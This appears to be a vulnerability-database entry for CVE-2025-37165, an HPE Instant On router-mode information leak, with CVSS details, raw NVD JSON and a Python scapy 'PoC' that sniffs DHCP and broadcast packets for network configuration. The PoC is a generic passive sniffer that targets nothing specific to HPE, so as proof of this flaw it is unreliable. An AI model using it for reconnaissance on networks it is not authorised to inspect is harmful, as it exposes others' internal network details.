Security Vulnerability Report
中文
CVE-2025-37165 CVSS 7.5 HIGH

CVE-2025-37165

Published: 2026-01-13 18:16:05
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A vulnerability in the router mode configuration of HPE Instant On Access Points exposed certain network configuration details to unintended interfaces. A malicious actor could gain knowledge of internal network configuration details through inspecting impacted packets.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

HPE Instant On Access Points (Router Mode) - 所有受影响的固件版本
具体受影响版本需参考HPE官方安全公告确认

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37165 PoC - Network Configuration Information Disclosure # Target: HPE Instant On Access Points (Router Mode) import scapy.all as scapy from scapy.layers.inet import IP, TCP, UDP from scapy.layers.dhcp import DHCP from scapy.layers.dns import DNS import json def sniff_network_traffic(interface="eth0", count=100): """Sniff network packets to capture exposed network configuration""" print(f"[*] Starting packet capture on interface: {interface}") print("[*] Looking for HPE Instant On network configuration packets...\n") packets = scapy.sniff(iface=interface, count=count, timeout=30) config_info = [] for packet in packets: # Check for DHCP messages that may contain network config if packet.haslayer(DHCP): dhcp_options = packet[DHCP].options for option in dhcp_options: if isinstance(option, tuple) and len(option) >= 2: if option[0] == 'router': # Gateway config_info.append({ 'type': 'gateway', 'value': option[1], 'source': packet[IP].src if packet.haslayer(IP) else 'unknown' }) elif option[0] == 'subnet': # Subnet mask config_info.append({ 'type': 'subnet_mask', 'value': option[1], 'source': packet[IP].src if packet.haslayer(IP) else 'unknown' }) elif option[0] == 'dns': # DNS servers config_info.append({ 'type': 'dns_server', 'value': option[1], 'source': packet[IP].src if packet.haslayer(IP) else 'unknown' }) # Check for broadcast packets with network information if packet.haslayer(IP) and packet[IP].dst == '255.255.255.255': config_info.append({ 'type': 'broadcast', 'src_ip': packet[IP].src, 'dst_ip': packet[IP].dst, 'payload_size': len(packet[IP].payload) }) return config_info def analyze_exposed_config(config_data): """Analyze and display exposed network configuration""" print("\n[+] Exposed Network Configuration Information:") print("=" * 60) if not config_data: print("[-] No configuration information found in captured packets") return for info in config_data: print(f"Type: {info.get('type', 'unknown')}") if 'value' in info: print(f" Value: {info['value']}") if 'source' in info: print(f" Source: {info['source']}") print("-" * 40) print(f"\n[!] Total configuration leaks found: {len(config_data)}") print("[*] This information could be used for further network attacks") if __name__ == "__main__": # Usage: python cve_2025_37165_poc.py -i <network_interface> import argparse parser = argparse.ArgumentParser(description='CVE-2025-37165 PoC') parser.add_argument('-i', '--interface', default='eth0', help='Network interface') parser.add_argument('-c', '--count', type=int, default=100, help='Packet count') args = parser.parse_args() print("=" * 60) print("CVE-2025-37165 PoC - HPE Instant On Information Disclosure") print("=" * 60) config_data = sniff_network_traffic(args.interface, args.count) analyze_exposed_config(config_data)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37165", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:05.330", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the router mode configuration of HPE Instant On Access Points exposed certain network configuration details to unintended interfaces. A malicious actor could gain knowledge of internal network configuration details through inspecting impacted packets."}, {"lang": "es", "value": "Una vulnerabilidad en la configuración del modo router de los puntos de acceso HPE Instant On expuso ciertos detalles de configuración de red a interfaces no intencionadas. Un actor malicioso podría obtener conocimiento de detalles de configuración de red internos mediante la inspección de paquetes afectados."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04988en_us&docLocale=en_US", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.